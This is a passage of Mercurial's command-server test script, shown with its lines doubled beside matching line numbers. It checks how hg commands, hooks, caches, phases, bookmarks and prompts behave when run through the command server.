176 >>> from hgclient import readchannel, sep, runcommand, check
176 >>> from hgclient import readchannel, sep, runcommand, check
177 >>> @check
177 >>> @check
178 ... def localhgrc(server):
178 ... def localhgrc(server):
179 ... readchannel(server)
179 ... readchannel(server)
180 ...
180 ...
181 ... # the cached repo local hgrc contains ui.foo=bar, so showconfig should
181 ... # the cached repo local hgrc contains ui.foo=bar, so showconfig should
182 ... # show it
182 ... # show it
183 ... runcommand(server, ['showconfig'], outfilter=sep)
183 ... runcommand(server, ['showconfig'], outfilter=sep)
184 ...
184 ...
185 ... # but not for this repo
185 ... # but not for this repo
186 ... runcommand(server, ['init', 'foo'])
186 ... runcommand(server, ['init', 'foo'])
187 ... runcommand(server, ['-R', 'foo', 'showconfig', 'ui', 'defaults'])
187 ... runcommand(server, ['-R', 'foo', 'showconfig', 'ui', 'defaults'])
188 *** runcommand showconfig
188 *** runcommand showconfig
189 bundle.mainreporoot=$TESTTMP/repo
189 bundle.mainreporoot=$TESTTMP/repo
190 devel.all-warnings=true
190 devel.all-warnings=true
191 devel.default-date=0 0
191 devel.default-date=0 0
192 extensions.fsmonitor= (fsmonitor !)
192 extensions.fsmonitor= (fsmonitor !)
193 largefiles.usercache=$TESTTMP/.cache/largefiles
193 largefiles.usercache=$TESTTMP/.cache/largefiles
194 ui.slash=True
194 ui.slash=True
195 ui.interactive=False
195 ui.interactive=False
196 ui.mergemarkers=detailed
196 ui.mergemarkers=detailed
197 ui.usehttp2=true (?)
197 ui.usehttp2=true (?)
198 ui.foo=bar
198 ui.foo=bar
199 ui.nontty=true
199 ui.nontty=true
200 web.address=localhost
200 web.address=localhost
201 web\.ipv6=(?:True|False) (re)
201 web\.ipv6=(?:True|False) (re)
202 *** runcommand init foo
202 *** runcommand init foo
203 *** runcommand -R foo showconfig ui defaults
203 *** runcommand -R foo showconfig ui defaults
204 ui.slash=True
204 ui.slash=True
205 ui.interactive=False
205 ui.interactive=False
206 ui.mergemarkers=detailed
206 ui.mergemarkers=detailed
207 ui.usehttp2=true (?)
207 ui.usehttp2=true (?)
208 ui.nontty=true
208 ui.nontty=true
209
209
210 $ rm -R foo
210 $ rm -R foo
211
211
212 #if windows
212 #if windows
213 $ PYTHONPATH="$TESTTMP/repo;$PYTHONPATH"
213 $ PYTHONPATH="$TESTTMP/repo;$PYTHONPATH"
214 #else
214 #else
215 $ PYTHONPATH="$TESTTMP/repo:$PYTHONPATH"
215 $ PYTHONPATH="$TESTTMP/repo:$PYTHONPATH"
216 #endif
216 #endif
217
217
218 $ cat <<EOF > hook.py
218 $ cat <<EOF > hook.py
219 > from __future__ import print_function
219 > from __future__ import print_function
220 > import sys
220 > import sys
221 > def hook(**args):
221 > def hook(**args):
222 > print('hook talking')
222 > print('hook talking')
223 > print('now try to read something: %r' % sys.stdin.read())
223 > print('now try to read something: %r' % sys.stdin.read())
224 > EOF
224 > EOF
225
225
226 >>> from hgclient import readchannel, runcommand, check, stringio
226 >>> from hgclient import readchannel, runcommand, check, stringio
227 >>> @check
227 >>> @check
228 ... def hookoutput(server):
228 ... def hookoutput(server):
229 ... readchannel(server)
229 ... readchannel(server)
230 ... runcommand(server, ['--config',
230 ... runcommand(server, ['--config',
231 ... 'hooks.pre-identify=python:hook.hook',
231 ... 'hooks.pre-identify=python:hook.hook',
232 ... 'id'],
232 ... 'id'],
233 ... input=stringio('some input'))
233 ... input=stringio('some input'))
234 *** runcommand --config hooks.pre-identify=python:hook.hook id
234 *** runcommand --config hooks.pre-identify=python:hook.hook id
235 eff892de26ec tip
235 eff892de26ec tip
236
236
237 Clean hook cached version
237 Clean hook cached version
238 $ rm hook.py*
238 $ rm hook.py*
239 $ rm -Rf __pycache__
239 $ rm -Rf __pycache__
240
240
241 $ echo a >> a
241 $ echo a >> a
242 >>> import os
242 >>> import os
243 >>> from hgclient import readchannel, runcommand, check
243 >>> from hgclient import readchannel, runcommand, check
244 >>> @check
244 >>> @check
245 ... def outsidechanges(server):
245 ... def outsidechanges(server):
246 ... readchannel(server)
246 ... readchannel(server)
247 ... runcommand(server, ['status'])
247 ... runcommand(server, ['status'])
248 ... os.system('hg ci -Am2')
248 ... os.system('hg ci -Am2')
249 ... runcommand(server, ['tip'])
249 ... runcommand(server, ['tip'])
250 ... runcommand(server, ['status'])
250 ... runcommand(server, ['status'])
251 *** runcommand status
251 *** runcommand status
252 M a
252 M a
253 *** runcommand tip
253 *** runcommand tip
254 changeset: 1:d3a0a68be6de
254 changeset: 1:d3a0a68be6de
255 tag: tip
255 tag: tip
256 user: test
256 user: test
257 date: Thu Jan 01 00:00:00 1970 +0000
257 date: Thu Jan 01 00:00:00 1970 +0000
258 summary: 2
258 summary: 2
259
259
260 *** runcommand status
260 *** runcommand status
261
261
262 >>> import os
262 >>> import os
263 >>> from hgclient import readchannel, runcommand, check
263 >>> from hgclient import readchannel, runcommand, check
264 >>> @check
264 >>> @check
265 ... def bookmarks(server):
265 ... def bookmarks(server):
266 ... readchannel(server)
266 ... readchannel(server)
267 ... runcommand(server, ['bookmarks'])
267 ... runcommand(server, ['bookmarks'])
268 ...
268 ...
269 ... # changes .hg/bookmarks
269 ... # changes .hg/bookmarks
270 ... os.system('hg bookmark -i bm1')
270 ... os.system('hg bookmark -i bm1')
271 ... os.system('hg bookmark -i bm2')
271 ... os.system('hg bookmark -i bm2')
272 ... runcommand(server, ['bookmarks'])
272 ... runcommand(server, ['bookmarks'])
273 ...
273 ...
274 ... # changes .hg/bookmarks.current
274 ... # changes .hg/bookmarks.current
275 ... os.system('hg upd bm1 -q')
275 ... os.system('hg upd bm1 -q')
276 ... runcommand(server, ['bookmarks'])
276 ... runcommand(server, ['bookmarks'])
277 ...
277 ...
278 ... runcommand(server, ['bookmarks', 'bm3'])
278 ... runcommand(server, ['bookmarks', 'bm3'])
279 ... f = open('a', 'ab')
279 ... f = open('a', 'ab')
280 ... f.write('a\n')
280 ... f.write('a\n')
281 ... f.close()
281 ... f.close()
282 ... runcommand(server, ['commit', '-Amm'])
282 ... runcommand(server, ['commit', '-Amm'])
283 ... runcommand(server, ['bookmarks'])
283 ... runcommand(server, ['bookmarks'])
284 *** runcommand bookmarks
284 *** runcommand bookmarks
285 no bookmarks set
285 no bookmarks set
286 *** runcommand bookmarks
286 *** runcommand bookmarks
287 bm1 1:d3a0a68be6de
287 bm1 1:d3a0a68be6de
288 bm2 1:d3a0a68be6de
288 bm2 1:d3a0a68be6de
289 *** runcommand bookmarks
289 *** runcommand bookmarks
290 * bm1 1:d3a0a68be6de
290 * bm1 1:d3a0a68be6de
291 bm2 1:d3a0a68be6de
291 bm2 1:d3a0a68be6de
292 *** runcommand bookmarks bm3
292 *** runcommand bookmarks bm3
293 *** runcommand commit -Amm
293 *** runcommand commit -Amm
294 *** runcommand bookmarks
294 *** runcommand bookmarks
295 bm1 1:d3a0a68be6de
295 bm1 1:d3a0a68be6de
296 bm2 1:d3a0a68be6de
296 bm2 1:d3a0a68be6de
297 * bm3 2:aef17e88f5f0
297 * bm3 2:aef17e88f5f0
298
298
299 >>> import os
299 >>> import os
300 >>> from hgclient import readchannel, runcommand, check
300 >>> from hgclient import readchannel, runcommand, check
301 >>> @check
301 >>> @check
302 ... def tagscache(server):
302 ... def tagscache(server):
303 ... readchannel(server)
303 ... readchannel(server)
304 ... runcommand(server, ['id', '-t', '-r', '0'])
304 ... runcommand(server, ['id', '-t', '-r', '0'])
305 ... os.system('hg tag -r 0 foo')
305 ... os.system('hg tag -r 0 foo')
306 ... runcommand(server, ['id', '-t', '-r', '0'])
306 ... runcommand(server, ['id', '-t', '-r', '0'])
307 *** runcommand id -t -r 0
307 *** runcommand id -t -r 0
308
308
309 *** runcommand id -t -r 0
309 *** runcommand id -t -r 0
310 foo
310 foo
311
311
312 >>> import os
312 >>> import os
313 >>> from hgclient import readchannel, runcommand, check
313 >>> from hgclient import readchannel, runcommand, check
314 >>> @check
314 >>> @check
315 ... def setphase(server):
315 ... def setphase(server):
316 ... readchannel(server)
316 ... readchannel(server)
317 ... runcommand(server, ['phase', '-r', '.'])
317 ... runcommand(server, ['phase', '-r', '.'])
318 ... os.system('hg phase -r . -p')
318 ... os.system('hg phase -r . -p')
319 ... runcommand(server, ['phase', '-r', '.'])
319 ... runcommand(server, ['phase', '-r', '.'])
320 *** runcommand phase -r .
320 *** runcommand phase -r .
321 3: draft
321 3: draft
322 *** runcommand phase -r .
322 *** runcommand phase -r .
323 3: public
323 3: public
324
324
325 $ echo a >> a
325 $ echo a >> a
326 >>> from hgclient import readchannel, runcommand, check
326 >>> from hgclient import readchannel, runcommand, check
327 >>> @check
327 >>> @check
328 ... def rollback(server):
328 ... def rollback(server):
329 ... readchannel(server)
329 ... readchannel(server)
330 ... runcommand(server, ['phase', '-r', '.', '-p'])
330 ... runcommand(server, ['phase', '-r', '.', '-p'])
331 ... runcommand(server, ['commit', '-Am.'])
331 ... runcommand(server, ['commit', '-Am.'])
332 ... runcommand(server, ['rollback'])
332 ... runcommand(server, ['rollback'])
333 ... runcommand(server, ['phase', '-r', '.'])
333 ... runcommand(server, ['phase', '-r', '.'])
334 *** runcommand phase -r . -p
334 *** runcommand phase -r . -p
335 no phases changed
335 no phases changed
336 *** runcommand commit -Am.
336 *** runcommand commit -Am.
337 *** runcommand rollback
337 *** runcommand rollback
338 repository tip rolled back to revision 3 (undo commit)
338 repository tip rolled back to revision 3 (undo commit)
339 working directory now based on revision 3
339 working directory now based on revision 3
340 *** runcommand phase -r .
340 *** runcommand phase -r .
341 3: public
341 3: public
342
342
343 >>> import os
343 >>> import os
344 >>> from hgclient import readchannel, runcommand, check
344 >>> from hgclient import readchannel, runcommand, check
345 >>> @check
345 >>> @check
346 ... def branch(server):
346 ... def branch(server):
347 ... readchannel(server)
347 ... readchannel(server)
348 ... runcommand(server, ['branch'])
348 ... runcommand(server, ['branch'])
349 ... os.system('hg branch foo')
349 ... os.system('hg branch foo')
350 ... runcommand(server, ['branch'])
350 ... runcommand(server, ['branch'])
351 ... os.system('hg branch default')
351 ... os.system('hg branch default')
352 *** runcommand branch
352 *** runcommand branch
353 default
353 default
354 marked working directory as branch foo
354 marked working directory as branch foo
355 (branches are permanent and global, did you want a bookmark?)
355 (branches are permanent and global, did you want a bookmark?)
356 *** runcommand branch
356 *** runcommand branch
357 foo
357 foo
358 marked working directory as branch default
358 marked working directory as branch default
359 (branches are permanent and global, did you want a bookmark?)
359 (branches are permanent and global, did you want a bookmark?)
360
360
361 $ touch .hgignore
361 $ touch .hgignore
362 >>> import os
362 >>> import os
363 >>> from hgclient import readchannel, runcommand, check
363 >>> from hgclient import readchannel, runcommand, check
364 >>> @check
364 >>> @check
365 ... def hgignore(server):
365 ... def hgignore(server):
366 ... readchannel(server)
366 ... readchannel(server)
367 ... runcommand(server, ['commit', '-Am.'])
367 ... runcommand(server, ['commit', '-Am.'])
368 ... f = open('ignored-file', 'ab')
368 ... f = open('ignored-file', 'ab')
369 ... f.write('')
369 ... f.write('')
370 ... f.close()
370 ... f.close()
371 ... f = open('.hgignore', 'ab')
371 ... f = open('.hgignore', 'ab')
372 ... f.write('ignored-file')
372 ... f.write('ignored-file')
373 ... f.close()
373 ... f.close()
374 ... runcommand(server, ['status', '-i', '-u'])
374 ... runcommand(server, ['status', '-i', '-u'])
375 *** runcommand commit -Am.
375 *** runcommand commit -Am.
376 adding .hgignore
376 adding .hgignore
377 *** runcommand status -i -u
377 *** runcommand status -i -u
378 I ignored-file
378 I ignored-file
379
379
380 cache of non-public revisions should be invalidated on repository change
380 cache of non-public revisions should be invalidated on repository change
381 (issue4855):
381 (issue4855):
382
382
383 >>> import os
383 >>> import os
384 >>> from hgclient import readchannel, runcommand, check
384 >>> from hgclient import readchannel, runcommand, check
385 >>> @check
385 >>> @check
386 ... def phasesetscacheaftercommit(server):
386 ... def phasesetscacheaftercommit(server):
387 ... readchannel(server)
387 ... readchannel(server)
388 ... # load _phasecache._phaserevs and _phasesets
388 ... # load _phasecache._phaserevs and _phasesets
389 ... runcommand(server, ['log', '-qr', 'draft()'])
389 ... runcommand(server, ['log', '-qr', 'draft()'])
390 ... # create draft commits by another process
390 ... # create draft commits by another process
391 ... for i in xrange(5, 7):
391 ... for i in xrange(5, 7):
392 ... f = open('a', 'ab')
392 ... f = open('a', 'ab')
393 ... f.seek(0, os.SEEK_END)
393 ... f.seek(0, os.SEEK_END)
394 ... f.write('a\n')
394 ... f.write('a\n')
395 ... f.close()
395 ... f.close()
396 ... os.system('hg commit -Aqm%d' % i)
396 ... os.system('hg commit -Aqm%d' % i)
397 ... # new commits should be listed as draft revisions
397 ... # new commits should be listed as draft revisions
398 ... runcommand(server, ['log', '-qr', 'draft()'])
398 ... runcommand(server, ['log', '-qr', 'draft()'])
399 *** runcommand log -qr draft()
399 *** runcommand log -qr draft()
400 4:7966c8e3734d
400 4:7966c8e3734d
401 *** runcommand log -qr draft()
401 *** runcommand log -qr draft()
402 4:7966c8e3734d
402 4:7966c8e3734d
403 5:41f6602d1c4f
403 5:41f6602d1c4f
404 6:10501e202c35
404 6:10501e202c35
405
405
406 >>> import os
406 >>> import os
407 >>> from hgclient import readchannel, runcommand, check
407 >>> from hgclient import readchannel, runcommand, check
408 >>> @check
408 >>> @check
409 ... def phasesetscacheafterstrip(server):
409 ... def phasesetscacheafterstrip(server):
410 ... readchannel(server)
410 ... readchannel(server)
411 ... # load _phasecache._phaserevs and _phasesets
411 ... # load _phasecache._phaserevs and _phasesets
412 ... runcommand(server, ['log', '-qr', 'draft()'])
412 ... runcommand(server, ['log', '-qr', 'draft()'])
413 ... # strip cached revisions by another process
413 ... # strip cached revisions by another process
414 ... os.system('hg --config extensions.strip= strip -q 5')
414 ... os.system('hg --config extensions.strip= strip -q 5')
415 ... # shouldn't abort by "unknown revision '6'"
415 ... # shouldn't abort by "unknown revision '6'"
416 ... runcommand(server, ['log', '-qr', 'draft()'])
416 ... runcommand(server, ['log', '-qr', 'draft()'])
417 *** runcommand log -qr draft()
417 *** runcommand log -qr draft()
418 4:7966c8e3734d
418 4:7966c8e3734d
419 5:41f6602d1c4f
419 5:41f6602d1c4f
420 6:10501e202c35
420 6:10501e202c35
421 *** runcommand log -qr draft()
421 *** runcommand log -qr draft()
422 4:7966c8e3734d
422 4:7966c8e3734d
423
423
424 cache of phase roots should be invalidated on strip (issue3827):
424 cache of phase roots should be invalidated on strip (issue3827):
425
425
426 >>> import os
426 >>> import os
427 >>> from hgclient import readchannel, sep, runcommand, check
427 >>> from hgclient import readchannel, sep, runcommand, check
428 >>> @check
428 >>> @check
429 ... def phasecacheafterstrip(server):
429 ... def phasecacheafterstrip(server):
430 ... readchannel(server)
430 ... readchannel(server)
431 ...
431 ...
432 ... # create new head, 5:731265503d86
432 ... # create new head, 5:731265503d86
433 ... runcommand(server, ['update', '-C', '0'])
433 ... runcommand(server, ['update', '-C', '0'])
434 ... f = open('a', 'ab')
434 ... f = open('a', 'ab')
435 ... f.write('a\n')
435 ... f.write('a\n')
436 ... f.close()
436 ... f.close()
437 ... runcommand(server, ['commit', '-Am.', 'a'])
437 ... runcommand(server, ['commit', '-Am.', 'a'])
438 ... runcommand(server, ['log', '-Gq'])
438 ... runcommand(server, ['log', '-Gq'])
439 ...
439 ...
440 ... # make it public; draft marker moves to 4:7966c8e3734d
440 ... # make it public; draft marker moves to 4:7966c8e3734d
441 ... runcommand(server, ['phase', '-p', '.'])
441 ... runcommand(server, ['phase', '-p', '.'])
442 ... # load _phasecache.phaseroots
442 ... # load _phasecache.phaseroots
443 ... runcommand(server, ['phase', '.'], outfilter=sep)
443 ... runcommand(server, ['phase', '.'], outfilter=sep)
444 ...
444 ...
445 ... # strip 1::4 outside server
445 ... # strip 1::4 outside server
446 ... os.system('hg -q --config extensions.mq= strip 1')
446 ... os.system('hg -q --config extensions.mq= strip 1')
447 ...
447 ...
448 ... # shouldn't raise "7966c8e3734d: no node!"
448 ... # shouldn't raise "7966c8e3734d: no node!"
449 ... runcommand(server, ['branches'])
449 ... runcommand(server, ['branches'])
450 *** runcommand update -C 0
450 *** runcommand update -C 0
451 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
451 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
452 (leaving bookmark bm3)
452 (leaving bookmark bm3)
453 *** runcommand commit -Am. a
453 *** runcommand commit -Am. a
454 created new head
454 created new head
455 *** runcommand log -Gq
455 *** runcommand log -Gq
456 @ 5:731265503d86
456 @ 5:731265503d86
457 |
457 |
458 | o 4:7966c8e3734d
458 | o 4:7966c8e3734d
459 | |
459 | |
460 | o 3:b9b85890c400
460 | o 3:b9b85890c400
461 | |
461 | |
462 | o 2:aef17e88f5f0
462 | o 2:aef17e88f5f0
463 | |
463 | |
464 | o 1:d3a0a68be6de
464 | o 1:d3a0a68be6de
465 |/
465 |/
466 o 0:eff892de26ec
466 o 0:eff892de26ec
467
467
468 *** runcommand phase -p .
468 *** runcommand phase -p .
469 *** runcommand phase .
469 *** runcommand phase .
470 5: public
470 5: public
471 *** runcommand branches
471 *** runcommand branches
472 default 1:731265503d86
472 default 1:731265503d86
473
473
474 in-memory cache must be reloaded if transaction is aborted. otherwise
474 in-memory cache must be reloaded if transaction is aborted. otherwise
475 changelog and manifest would have invalid node:
475 changelog and manifest would have invalid node:
476
476
477 $ echo a >> a
477 $ echo a >> a
478 >>> from hgclient import readchannel, runcommand, check
478 >>> from hgclient import readchannel, runcommand, check
479 >>> @check
479 >>> @check
480 ... def txabort(server):
480 ... def txabort(server):
481 ... readchannel(server)
481 ... readchannel(server)
482 ... runcommand(server, ['commit', '--config', 'hooks.pretxncommit=false',
482 ... runcommand(server, ['commit', '--config', 'hooks.pretxncommit=false',
483 ... '-mfoo'])
483 ... '-mfoo'])
484 ... runcommand(server, ['verify'])
484 ... runcommand(server, ['verify'])
485 *** runcommand commit --config hooks.pretxncommit=false -mfoo
485 *** runcommand commit --config hooks.pretxncommit=false -mfoo
486 transaction abort!
486 transaction abort!
487 rollback completed
487 rollback completed
488 abort: pretxncommit hook exited with status 1
488 abort: pretxncommit hook exited with status 1
489 [255]
489 [255]
490 *** runcommand verify
490 *** runcommand verify
491 checking changesets
491 checking changesets
492 checking manifests
492 checking manifests
493 crosschecking files in changesets and manifests
493 crosschecking files in changesets and manifests
494 checking files
494 checking files
495 1 files, 2 changesets, 2 total revisions
495 1 files, 2 changesets, 2 total revisions
496 $ hg revert --no-backup -aq
496 $ hg revert --no-backup -aq
497
497
498 $ cat >> .hg/hgrc << EOF
498 $ cat >> .hg/hgrc << EOF
499 > [experimental]
499 > [experimental]
500 > evolution=createmarkers
500 > evolution=createmarkers
501 > EOF
501 > EOF
502
502
503 >>> import os
503 >>> import os
504 >>> from hgclient import readchannel, runcommand, check
504 >>> from hgclient import readchannel, runcommand, check
505 >>> @check
505 >>> @check
506 ... def obsolete(server):
506 ... def obsolete(server):
507 ... readchannel(server)
507 ... readchannel(server)
508 ...
508 ...
509 ... runcommand(server, ['up', 'null'])
509 ... runcommand(server, ['up', 'null'])
510 ... runcommand(server, ['phase', '-df', 'tip'])
510 ... runcommand(server, ['phase', '-df', 'tip'])
511 ... cmd = 'hg debugobsolete `hg log -r tip --template {node}`'
511 ... cmd = 'hg debugobsolete `hg log -r tip --template {node}`'
512 ... if os.name == 'nt':
512 ... if os.name == 'nt':
513 ... cmd = 'sh -c "%s"' % cmd # run in sh, not cmd.exe
513 ... cmd = 'sh -c "%s"' % cmd # run in sh, not cmd.exe
514 ... os.system(cmd)
514 ... os.system(cmd)
515 ... runcommand(server, ['log', '--hidden'])
515 ... runcommand(server, ['log', '--hidden'])
516 ... runcommand(server, ['log'])
516 ... runcommand(server, ['log'])
517 *** runcommand up null
517 *** runcommand up null
518 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
518 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
519 *** runcommand phase -df tip
519 *** runcommand phase -df tip
520 obsoleted 1 changesets
520 obsoleted 1 changesets
521 *** runcommand log --hidden
521 *** runcommand log --hidden
522 changeset: 1:731265503d86
522 changeset: 1:731265503d86
523 tag: tip
523 tag: tip
524 user: test
524 user: test
525 date: Thu Jan 01 00:00:00 1970 +0000
525 date: Thu Jan 01 00:00:00 1970 +0000
526 summary: .
526 summary: .
527
527
528 changeset: 0:eff892de26ec
528 changeset: 0:eff892de26ec
529 bookmark: bm1
529 bookmark: bm1
530 bookmark: bm2
530 bookmark: bm2
531 bookmark: bm3
531 bookmark: bm3
532 user: test
532 user: test
533 date: Thu Jan 01 00:00:00 1970 +0000
533 date: Thu Jan 01 00:00:00 1970 +0000
534 summary: 1
534 summary: 1
535
535
536 *** runcommand log
536 *** runcommand log
537 changeset: 0:eff892de26ec
537 changeset: 0:eff892de26ec
538 bookmark: bm1
538 bookmark: bm1
539 bookmark: bm2
539 bookmark: bm2
540 bookmark: bm3
540 bookmark: bm3
541 tag: tip
541 tag: tip
542 user: test
542 user: test
543 date: Thu Jan 01 00:00:00 1970 +0000
543 date: Thu Jan 01 00:00:00 1970 +0000
544 summary: 1
544 summary: 1
545
545
546
546
547 $ cat <<EOF >> .hg/hgrc
547 $ cat <<EOF >> .hg/hgrc
548 > [extensions]
548 > [extensions]
549 > mq =
549 > mq =
550 > EOF
550 > EOF
551
551
552 >>> import os
552 >>> import os
553 >>> from hgclient import readchannel, runcommand, check
553 >>> from hgclient import readchannel, runcommand, check
554 >>> @check
554 >>> @check
555 ... def mqoutsidechanges(server):
555 ... def mqoutsidechanges(server):
556 ... readchannel(server)
556 ... readchannel(server)
557 ...
557 ...
558 ... # load repo.mq
558 ... # load repo.mq
559 ... runcommand(server, ['qapplied'])
559 ... runcommand(server, ['qapplied'])
560 ... os.system('hg qnew 0.diff')
560 ... os.system('hg qnew 0.diff')
561 ... # repo.mq should be invalidated
561 ... # repo.mq should be invalidated
562 ... runcommand(server, ['qapplied'])
562 ... runcommand(server, ['qapplied'])
563 ...
563 ...
564 ... runcommand(server, ['qpop', '--all'])
564 ... runcommand(server, ['qpop', '--all'])
565 ... os.system('hg qqueue --create foo')
565 ... os.system('hg qqueue --create foo')
566 ... # repo.mq should be recreated to point to new queue
566 ... # repo.mq should be recreated to point to new queue
567 ... runcommand(server, ['qqueue', '--active'])
567 ... runcommand(server, ['qqueue', '--active'])
568 *** runcommand qapplied
568 *** runcommand qapplied
569 *** runcommand qapplied
569 *** runcommand qapplied
570 0.diff
570 0.diff
571 *** runcommand qpop --all
571 *** runcommand qpop --all
572 popping 0.diff
572 popping 0.diff
573 patch queue now empty
573 patch queue now empty
574 *** runcommand qqueue --active
574 *** runcommand qqueue --active
575 foo
575 foo
576
576
577 $ cat <<EOF > dbgui.py
577 $ cat <<EOF > dbgui.py
578 > import os, sys
578 > import os, sys
579 > from mercurial import commands, registrar
579 > from mercurial import commands, registrar
580 > cmdtable = {}
580 > cmdtable = {}
581 > command = registrar.command(cmdtable)
581 > command = registrar.command(cmdtable)
582 > @command(b"debuggetpass", norepo=True)
582 > @command(b"debuggetpass", norepo=True)
583 > def debuggetpass(ui):
583 > def debuggetpass(ui):
584 > ui.write("%s\\n" % ui.getpass())
584 > ui.write("%s\\n" % ui.getpass())
585 > @command(b"debugprompt", norepo=True)
585 > @command(b"debugprompt", norepo=True)
586 > def debugprompt(ui):
586 > def debugprompt(ui):
587 > ui.write("%s\\n" % ui.prompt("prompt:"))
587 > ui.write("%s\\n" % ui.prompt("prompt:"))
588 > @command(b"debugreadstdin", norepo=True)
588 > @command(b"debugreadstdin", norepo=True)
589 > def debugreadstdin(ui):
589 > def debugreadstdin(ui):
590 > ui.write("read: %r\n" % sys.stdin.read(1))
590 > ui.write("read: %r\n" % sys.stdin.read(1))
591 > @command(b"debugwritestdout", norepo=True)
591 > @command(b"debugwritestdout", norepo=True)
592 > def debugwritestdout(ui):
592 > def debugwritestdout(ui):
593 > os.write(1, "low-level stdout fd and\n")
593 > os.write(1, "low-level stdout fd and\n")
594 > sys.stdout.write("stdout should be redirected to /dev/null\n")
594 > sys.stdout.write("stdout should be redirected to /dev/null\n")
595 > sys.stdout.flush()
595 > sys.stdout.flush()
596 > EOF
596 > EOF
597 $ cat <<EOF >> .hg/hgrc
597 $ cat <<EOF >> .hg/hgrc
598 > [extensions]
598 > [extensions]
599 > dbgui = dbgui.py
599 > dbgui = dbgui.py
600 > EOF
600 > EOF
601
601
602 >>> from hgclient import readchannel, runcommand, check, stringio
602 >>> from hgclient import readchannel, runcommand, check, stringio
603 >>> @check
603 >>> @check
604 ... def getpass(server):
604 ... def getpass(server):
605 ... readchannel(server)
605 ... readchannel(server)
606 ... runcommand(server, ['debuggetpass', '--config',
606 ... runcommand(server, ['debuggetpass', '--config',
607 ... 'ui.interactive=True'],
607 ... 'ui.interactive=True'],
608 ... input=stringio('1234\n'))
608 ... input=stringio('1234\n'))
609 ... runcommand(server, ['debuggetpass', '--config',
609 ... runcommand(server, ['debuggetpass', '--config',
610 ... 'ui.interactive=True'],
610 ... 'ui.interactive=True'],
611 ... input=stringio('\n'))
611 ... input=stringio('\n'))
612 ... runcommand(server, ['debuggetpass', '--config',
612 ... runcommand(server, ['debuggetpass', '--config',
613 ... 'ui.interactive=True'],
613 ... 'ui.interactive=True'],
614 ... input=stringio(''))
614 ... input=stringio(''))
615 ... runcommand(server, ['debugprompt', '--config',
615 ... runcommand(server, ['debugprompt', '--config',
616 ... 'ui.interactive=True'],
616 ... 'ui.interactive=True'],
617 ... input=stringio('5678\n'))
617 ... input=stringio('5678\n'))
618 ... runcommand(server, ['debugreadstdin'])
618 ... runcommand(server, ['debugreadstdin'])
619 ... runcommand(server, ['debugwritestdout'])
619 ... runcommand(server, ['debugwritestdout'])
620 *** runcommand debuggetpass --config ui.interactive=True
620 *** runcommand debuggetpass --config ui.interactive=True
621 password: 1234
621 password: 1234
622 *** runcommand debuggetpass --config ui.interactive=True
622 *** runcommand debuggetpass --config ui.interactive=True
623 password:
623 password:
624 *** runcommand debuggetpass --config ui.interactive=True
624 *** runcommand debuggetpass --config ui.interactive=True
625 password: abort: response expected
625 password: abort: response expected
626 [255]
626 [255]
627 *** runcommand debugprompt --config ui.interactive=True
627 *** runcommand debugprompt --config ui.interactive=True
628 prompt: 5678
628 prompt: 5678
629 *** runcommand debugreadstdin
629 *** runcommand debugreadstdin
630 read: ''
630 read: ''
631 *** runcommand debugwritestdout
631 *** runcommand debugwritestdout
632
632
633
633
634 run commandserver in commandserver, which is silly but should work:
634 run commandserver in commandserver, which is silly but should work:
635
635
636 >>> from __future__ import print_function
636 >>> from __future__ import print_function
637 >>> from hgclient import readchannel, runcommand, check, stringio
637 >>> from hgclient import readchannel, runcommand, check, stringio
638 >>> @check
638 >>> @check
639 ... def nested(server):
639 ... def nested(server):
640 ... print('%c, %r' % readchannel(server))
640 ... print('%c, %r' % readchannel(server))
641 ... class nestedserver(object):
641 ... class nestedserver(object):
642 ... stdin = stringio('getencoding\n')
642 ... stdin = stringio('getencoding\n')
643 ... stdout = stringio()
643 ... stdout = stringio()
644 ... runcommand(server, ['serve', '--cmdserver', 'pipe'],
644 ... runcommand(server, ['serve', '--cmdserver', 'pipe'],
645 ... output=nestedserver.stdout, input=nestedserver.stdin)
645 ... output=nestedserver.stdout, input=nestedserver.stdin)
646 ... nestedserver.stdout.seek(0)
646 ... nestedserver.stdout.seek(0)
647 ... print('%c, %r' % readchannel(nestedserver)) # hello
647 ... print('%c, %r' % readchannel(nestedserver)) # hello
648 ... print('%c, %r' % readchannel(nestedserver)) # getencoding
648 ... print('%c, %r' % readchannel(nestedserver)) # getencoding
649 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
649 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
650 *** runcommand serve --cmdserver pipe
650 *** runcommand serve --cmdserver pipe
651 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
651 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
652 r, '*' (glob)
652 r, '*' (glob)
653
653
654
654
655 start without repository:
655 start without repository:
656
656
657 $ cd ..
657 $ cd ..
658
658
659 >>> from __future__ import print_function
659 >>> from __future__ import print_function
660 >>> from hgclient import readchannel, runcommand, check
660 >>> from hgclient import readchannel, runcommand, check
661 >>> @check
661 >>> @check
662 ... def hellomessage(server):
662 ... def hellomessage(server):
663 ... ch, data = readchannel(server)
663 ... ch, data = readchannel(server)
664 ... print('%c, %r' % (ch, data))
664 ... print('%c, %r' % (ch, data))
665 ... # run an arbitrary command to make sure the next thing the server
665 ... # run an arbitrary command to make sure the next thing the server
666 ... # sends isn't part of the hello message
666 ... # sends isn't part of the hello message
667 ... runcommand(server, ['id'])
667 ... runcommand(server, ['id'])
668 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
668 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
669 *** runcommand id
669 *** runcommand id
670 abort: there is no Mercurial repository here (.hg not found)
670 abort: there is no Mercurial repository here (.hg not found)
671 [255]
671 [255]
672
672
673 >>> from hgclient import readchannel, runcommand, check
673 >>> from hgclient import readchannel, runcommand, check
674 >>> @check
674 >>> @check
675 ... def startwithoutrepo(server):
675 ... def startwithoutrepo(server):
676 ... readchannel(server)
676 ... readchannel(server)
677 ... runcommand(server, ['init', 'repo2'])
677 ... runcommand(server, ['init', 'repo2'])
678 ... runcommand(server, ['id', '-R', 'repo2'])
678 ... runcommand(server, ['id', '-R', 'repo2'])
679 *** runcommand init repo2
679 *** runcommand init repo2
680 *** runcommand id -R repo2
680 *** runcommand id -R repo2
681 000000000000 tip
681 000000000000 tip
682
682
683
683
684 don't fall back to cwd if invalid -R path is specified (issue4805):
684 don't fall back to cwd if invalid -R path is specified (issue4805):
685
685
